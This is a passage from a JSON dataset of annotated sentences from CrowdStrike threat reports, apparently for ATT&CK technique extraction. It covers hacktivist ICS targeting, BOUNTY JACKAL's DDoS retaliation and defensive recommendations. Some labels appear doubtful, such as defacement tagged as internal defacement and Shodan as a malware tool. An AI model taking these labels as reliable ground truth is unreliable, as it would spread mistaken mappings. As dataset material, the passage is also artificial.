hacktivist groups’ infrastructure and arrested hacktivist members.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s323-2aa541", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 323, "context_before": "During this reporting period, international law enforcement — including European authorities — disrupted multiple hacktivist groups’ infrastructure and arrested hacktivist members.", "sentence_text": "This law enforcement activity aligns with broader European goals to combat cybercrime, such as the European Multidisciplinary Platform Against Criminal Threats’ (EMPACT) classification of cybercrime as a high priority in EMPACT 2022-2025.25 25 https://www.europol.europa.eu/crime-areas-and-trends/eu-policy-cycle-empact", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s324-e38d46", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 324, "context_before": "This law enforcement activity aligns with broader European goals to combat cybercrime, such as the European Multidisciplinary Platform Against Criminal Threats’ (EMPACT) classification of cybercrime as a high priority in EMPACT 2022-2025.25 25 https://www.europol.europa.eu/crime-areas-and-trends/eu-policy-cycle-empact", "sentence_text": "Hacktivists stated that political grievances were the primary driver for ICS targeting, with Z-Alliance responsible for the largest volume of claims during this time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s325-19c0f4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 325, "context_before": "Hacktivists stated that political grievances were the primary driver for ICS targeting, with Z-Alliance responsible for the largest volume of claims during this time.", "sentence_text": "The group reportedly used publicly available tools such as Shodan and RealVNC Viewer in their attacks.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Use publicly available tools such as Shodan and RealVNC Viewer in attacks.", "entities": [ { "text": "used publicly available tools such as Shodan and RealVNC Viewer in their attacks", "start": 21, "end": 101, "label": "Action" }, { "text": "Shodan", "start": 59, "end": 65, "label": "MalwareTool" }, { "text": "RealVNC Viewer", "start": 70, "end": 84, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s326-afba5b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 326, "context_before": "The group reportedly used publicly available tools such as Shodan and RealVNC Viewer in their attacks.", "sentence_text": "Though their purported activity focused on non-European entities, these claims highlighted hacktivists' growing interest in targeting ICS devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s327-042006", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 327, "context_before": "Though their purported activity focused on non-European entities, these claims highlighted hacktivists' growing interest in targeting ICS devices.", "sentence_text": "Hacktivist groups will likely continue demonstrating interest in targeting ICSs globally over the next 12 months.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s328-2ff7da", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 328, "context_before": "Hacktivist groups will likely continue demonstrating interest in targeting ICSs globally over the next 12 months.", "sentence_text": "However, most will likely demonstrate limited technical capabilities and rely on exaggerated claims or publicly available malware designed to target ICS devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s329-01b834", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 329, "context_before": "However, most will likely demonstrate limited technical capabilities and rely on exaggerated claims or publicly available malware designed to target ICS devices.", "sentence_text": "These assessments are made with moderate confidence based on an observed increase in claimed hacktivist activity against these devices and systems during the reporting period as well as hacktivists’ desire for attention.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s330-de1122", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 330, "context_before": "These assessments are made with moderate confidence based on an observed increase in claimed hacktivist activity against these devices and systems during the reporting period as well as hacktivists’ desire for attention.", "sentence_text": "Hacktivists responded to law enforcement activity through retaliatory campaigns against entities in the targeted countries, OPSEC adjustments, and strategic social media messaging to downplay the impact of law enforcement activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s331-92b5e9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 331, "context_before": "Hacktivists responded to law enforcement activity through retaliatory campaigns against entities in the targeted countries, OPSEC adjustments, and strategic social media messaging to downplay the impact of law enforcement activity.", "sentence_text": "During this time, multiple law enforcement actions targeted BOUNTY JACKAL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s332-ccbfc0", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 332, "context_before": "During this time, multiple law enforcement actions targeted BOUNTY JACKAL.", "sentence_text": "In July 2024, Spanish authorities arrested BOUNTY JACKAL members.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s333-54145c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 333, "context_before": "In July 2024, Spanish authorities arrested BOUNTY JACKAL members.", "sentence_text": "These arrests prompted the adversary to implement new OPSEC procedures and launch coordinated DDoS attacks against Spanish websites.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499.004", "name": "Application or System Exploitation" } ], "procedure": "The adversary adopted new OPSEC measures and launched coordinated DDoS attacks against Spanish websites", "entities": [ { "text": "adversary ", "start": 27, "end": 37, "label": "ThreatActor" }, { "text": "implement new OPSEC procedures", "start": 40, "end": 70, "label": "Action" }, { "text": "launch coordinated DDoS attacks", "start": 75, "end": 106, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p42-s334-53d9ff", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 42, "sentence_id": 334, "context_before": "These arrests prompted the adversary to implement new OPSEC procedures and launch coordinated DDoS attacks against Spanish websites.", "sentence_text": "The adversary targeted countries associated with Operation Eastwood with DDoS attacks, website defacements, and purported infrastructure breaches and claimed the Europol operation caused limited impact to the group.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" }, { "id": "T1491.001", "name": "Internal Defacement" } ], "procedure": "Target countries associated with Operation Eastwood using DDoS attacks, website defacements, and infrastructure breaches.", "entities": [ { "text": "targeted countries associated with Operation Eastwood with DDoS attacks, website defacements, and purported infrastructure breaches", "start": 14, "end": 145, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s335-371131", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 335, "context_before": "The adversary targeted countries associated with Operation Eastwood with DDoS attacks, website defacements, and purported infrastructure breaches and claimed the Europol operation caused limited impact to the group.", "sentence_text": "Conclusion\neCrime adversaries will almost certainly continue to prioritize targeting Europe-based entities in the foreseeable future due to financial motivations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s336-236ed8", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 336, "context_before": "Conclusion\neCrime adversaries will almost certainly continue to prioritize targeting Europe-based entities in the foreseeable future due to financial motivations.", "sentence_text": "Data extortion and ransomware will highly likely remain the most critical eCrime threat facing Europe, given the impact of successful intrusions and BGH adversaries’ sustained targeting preference for the region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s337-b2b6f9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 337, "context_before": "Data extortion and ransomware will highly likely remain the most critical eCrime threat facing Europe, given the impact of successful intrusions and BGH adversaries’ sustained targeting preference for the region.", "sentence_text": "While the potential impact of successful intrusions remains high, eCrime adversaries benefit from historical and evolving initial access and malware delivery techniques, as demonstrated by adversaries’ abrupt and broad adoption of vishing and CAPTCHA lures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s338-6a4014", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 338, "context_before": "While the potential impact of successful intrusions remains high, eCrime adversaries benefit from historical and evolving initial access and malware delivery techniques, as demonstrated by adversaries’ abrupt and broad adoption of vishing and CAPTCHA lures.", "sentence_text": "The popularity of AI will likely further this evolution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s339-a3832d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 339, "context_before": "The popularity of AI will likely further this evolution.", "sentence_text": "Since 2024, international law enforcement operations have impacted eCrime adversaries’ operations, forums (e.g., BreachForums and XSS), and enabling services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s340-ddb62a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 340, "context_before": "Since 2024, international law enforcement operations have impacted eCrime adversaries’ operations, forums (e.g., BreachForums and XSS), and enabling services.", "sentence_text": "Therefore, eCrime threat actors based in and targeting Europe will continue to benefit from an ecosystem that enables threat actors of varying sophistication and lowers the entry barrier for eCrime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s341-0392f4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 341, "context_before": "Therefore, eCrime threat actors based in and targeting Europe will continue to benefit from an ecosystem that enables threat actors of varying sophistication and lowers the entry barrier for eCrime.", "sentence_text": "Given the ecosystem’s anonymity and enabling services’ indiscriminate nature, non-eCrime threats (including hybrid threat actor RENAISSANCE SPIDER and Russia-nexus EMBER BEAR) also benefit from these networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s342-f1f2a0", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 342, "context_before": "Given the ecosystem’s anonymity and enabling services’ indiscriminate nature, non-eCrime threats (including hybrid threat actor RENAISSANCE SPIDER and Russia-nexus EMBER BEAR) also benefit from these networks.", "sentence_text": "State-nexus adversaries will almost certainly continue to collect intelligence to shape national policy and engagement with European entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s343-efbb4f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 343, "context_before": "State-nexus adversaries will almost certainly continue to collect intelligence to shape national policy and engagement with European entities.", "sentence_text": "Adversarial states are highly motivated to target European entities likely because they offer lucrative political, economic, and technological information that can be exploited to advance strategic interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s344-5d4a7b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 344, "context_before": "Adversarial states are highly motivated to target European entities likely because they offer lucrative political, economic, and technological information that can be exploited to advance strategic interests.", "sentence_text": "Geopolitical developments can rapidly alter an adversary's intelligence requirements and operational scope.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s345-20d099", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 345, "context_before": "Geopolitical developments can rapidly alter an adversary's intelligence requirements and operational scope.", "sentence_text": "For countries such as Russia and Iran, cyber capabilities are integral for responding to conflicts perceived as threats to their sovereignty.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s346-339b52", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 346, "context_before": "For countries such as Russia and Iran, cyber capabilities are integral for responding to conflicts perceived as threats to their sovereignty.", "sentence_text": "Both countries conduct a full spectrum of operations, from passive espionage and reconnaissance campaigns to destructive hack-and-leak campaigns disguised as hacktivism and overtly destructive attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s347-ea1c1e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 347, "context_before": "Both countries conduct a full spectrum of operations, from passive espionage and reconnaissance campaigns to destructive hack-and-leak campaigns disguised as hacktivism and overtly destructive attacks.", "sentence_text": "Additionally, other state-nexus threat actors target European entities due to economic and financial motives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s348-2facb6", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 348, "context_before": "Additionally, other state-nexus threat actors target European entities due to economic and financial motives.", "sentence_text": "China-nexus adversaries often conduct intellectual property theft to bolster China’s international competitive edge and avoid costly internal research and development.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s349-2e3e46", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 349, "context_before": "China-nexus adversaries often conduct intellectual property theft to bolster China’s international competitive edge and avoid costly internal research and development.", "sentence_text": "In addition to intelligence collection efforts, DPRK-nexus adversaries often conduct opportunistic revenue-generation activities (such as cryptocurrency theft) to finance the DPRK regime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s350-93ac1e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 350, "context_before": "In addition to intelligence collection efforts, DPRK-nexus adversaries often conduct opportunistic revenue-generation activities (such as cryptocurrency theft) to finance the DPRK regime.", "sentence_text": "Global conflicts will likely continue to motivate hacktivist activity against European entities over the next 12 months.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p43-s351-9d524e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 43, "sentence_id": 351, "context_before": "Global conflicts will likely continue to motivate hacktivist activity against European entities over the next 12 months.", "sentence_text": "To maximize their public impact, some hacktivist groups will likely claim to target critical OT, including ICSs and SCADA systems, across Europe and globally.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s352-3e07e1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 352, "context_before": "To maximize their public impact, some hacktivist groups will likely claim to target critical OT, including ICSs and SCADA systems, across Europe and globally.", "sentence_text": "Agentic AI allows teams to apply expert reasoning and machine speed to accelerate outcomes and automate work.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s353-c8dcf7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 353, "context_before": "Agentic AI allows teams to apply expert reasoning and machine speed to accelerate outcomes and automate work.", "sentence_text": "By offloading time-intensive, repetitive tasks, agentic AI empowers human analysts to focus on proactive threat hunting and hypothesis-driven investigation, elevating both strategic impact and operational efficiency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s354-8f8f71", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 354, "context_before": "By offloading time-intensive, repetitive tasks, agentic AI empowers human analysts to focus on proactive threat hunting and hypothesis-driven investigation, elevating both strategic impact and operational efficiency.", "sentence_text": "Organizations should adopt phishing-resistant multifactor authentication solutions, such as hardware security keys, to prevent unauthorized access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s355-ba2423", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 355, "context_before": "Organizations should adopt phishing-resistant multifactor authentication solutions, such as hardware security keys, to prevent unauthorized access.", "sentence_text": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, and backdoor account creation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s356-7ac897", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 356, "context_before": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, and backdoor account creation.", "sentence_text": "Integrating these tools with extended detection and response (XDR) platforms enables comprehensive visibility and a unified defense against adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s357-fa102e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 357, "context_before": "Integrating these tools with extended detection and response (XDR) platforms enables comprehensive visibility and a unified defense against adversaries.", "sentence_text": "Additionally, organizations should educate users to recognize vishing and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s358-3d8416", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 358, "context_before": "Additionally, organizations should educate users to recognize vishing and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "sentence_text": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s359-9d6d0c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 359, "context_before": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "sentence_text": "Unlike traditional malware, these methods allow attackers to bypass legacy security measures by executing commands and using legitimate software to mimic normal operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s360-ba9b58", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 360, "context_before": "Unlike traditional malware, these methods allow attackers to bypass legacy security measures by executing commands and using legitimate software to mimic normal operations.", "sentence_text": "To counter this, organizations must modernize their detection and response strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s361-b739fa", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 361, "context_before": "To counter this, organizations must modernize their detection and response strategies.", "sentence_text": "Agentic AI-powered triage and investigations can extend these capabilities, autonomously analyzing signals across domains to surface high-fidelity insights and prioritize real threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p44-s362-04c1da", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 44, "sentence_id": 362, "context_before": "Agentic AI-powered triage and investigations can extend these capabilities, autonomously analyzing signals across domains to surface high-fidelity insights and prioritize real threats.", "sentence_text": "Proactive threat hunting and threat intelligence further enhance detection by identifying potential attack patterns and providing insights into adversary TTPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s363-b479c5", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 363, "context_before": "Proactive threat hunting and threat intelligence further enhance detection by identifying potential attack patterns and providing insights into adversary TTPs.", "sentence_text": "Defend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s364-f68bbb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 364, "context_before": "Defend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "sentence_text": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR)\ncapabilities are critical to counter these threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s365-6fbb83", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 365, "context_before": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR)\ncapabilities are critical to counter these threats.", "sentence_text": "Regular audits are also critical to maintaining security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s366-72d9d1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 366, "context_before": "Regular audits are also critical to maintaining security.", "sentence_text": "Frequent reviews of cloud environments allow teams to promptly address unused permissions and outdated configurations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s367-110674", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 367, "context_before": "Frequent reviews of cloud environments allow teams to promptly address unused permissions and outdated configurations.", "sentence_text": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s368-b60484", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 368, "context_before": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "sentence_text": "These multi-stage attacks often rely on public resources like proof-of-concept exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Adversaries use public resources such as PoC exploits and technical blogs to build multi-stage, stealthy payloads", "entities": [ { "text": "multi-stage attacks", "start": 6, "end": 25, "label": "Action" }, { "text": "public resources", "start": 40, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "proof-of-concept exploits", "start": 62, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "technical blogs", "start": 92, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "adversaries ", "start": 118, "end": 130, "label": "ThreatActor" }, { "text": "craft effective and hard-to-detect payloads", "start": 133, "end": 176, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s369-5533fa", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 369, "context_before": "These multi-stage attacks often rely on public resources like proof-of-concept exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "sentence_text": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s370-e2945e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 370, "context_before": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "sentence_text": "Know the adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s371-f39370", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 371, "context_before": "Know the adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "sentence_text": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s372-f54b8c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 372, "context_before": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "sentence_text": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s373-5e72fa", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 373, "context_before": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "sentence_text": "For security teams, practice makes perfect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p45-s374-1b73a1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 45, "sentence_id": 374, "context_before": "For security teams, practice makes perfect.", "sentence_text": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p46-s375-faf603", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 46, "sentence_id": 375, "context_before": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "sentence_text": "About\nhas redefined modern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p46-s376-157519", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 46, "sentence_id": 376, "context_before": "About\nhas redefined modern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "sentence_text": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p46-s377-fcfdb7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 46, "sentence_id": 377, "context_before": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "sentence_text": "| YouTube Start a free trial today: www.crowdstrike.com/free-trial-guide", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p1-s1-34154a", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "| BLOG MITRE CTID to Identify Adversaries Using Cloud Analytics October 13, 2022", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p1-s2-4b598d", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 1, "sentence_id": 2, "context_before": "| BLOG MITRE CTID to Identify Adversaries Using Cloud Analytics October 13, 2022", "sentence_text": "The CrowdStrike Falcon ® platform delivers a powerful combination of agentless capabilities to protect against misconfigurations and control plane attacks, along with agent-based runtime security to proactively secure cloud environments by harmonizing real-time cloud-native events and TTPs to comprehensively detect adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p1-s3-a77645", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 1, "sentence_id": 3, "context_before": "The CrowdStrike Falcon ® platform delivers a powerful combination of agentless capabilities to protect against misconfigurations and control plane attacks, along with agent-based runtime security to proactively secure cloud environments by harmonizing real-time cloud-native events and TTPs to comprehensively detect adversaries.", "sentence_text": "a new MITRE Center for Threat-Informed Defense initiative (CTID)\nto capture key adversarial tactics, techniques and procedures (TTPs) to improve detection of threat actor behavior in cloud environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p1-s4-e63b97", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 1, "sentence_id": 4, "context_before": "a new MITRE Center for Threat-Informed Defense initiative (CTID)\nto capture key adversarial tactics, techniques and procedures (TTPs) to improve detection of threat actor behavior in cloud environments.", "sentence_text": "The goal of the project was to map analytics across disparate infrastructures and cloud services to reduce alert noise and quickly identify abnormal and evasive behaviors 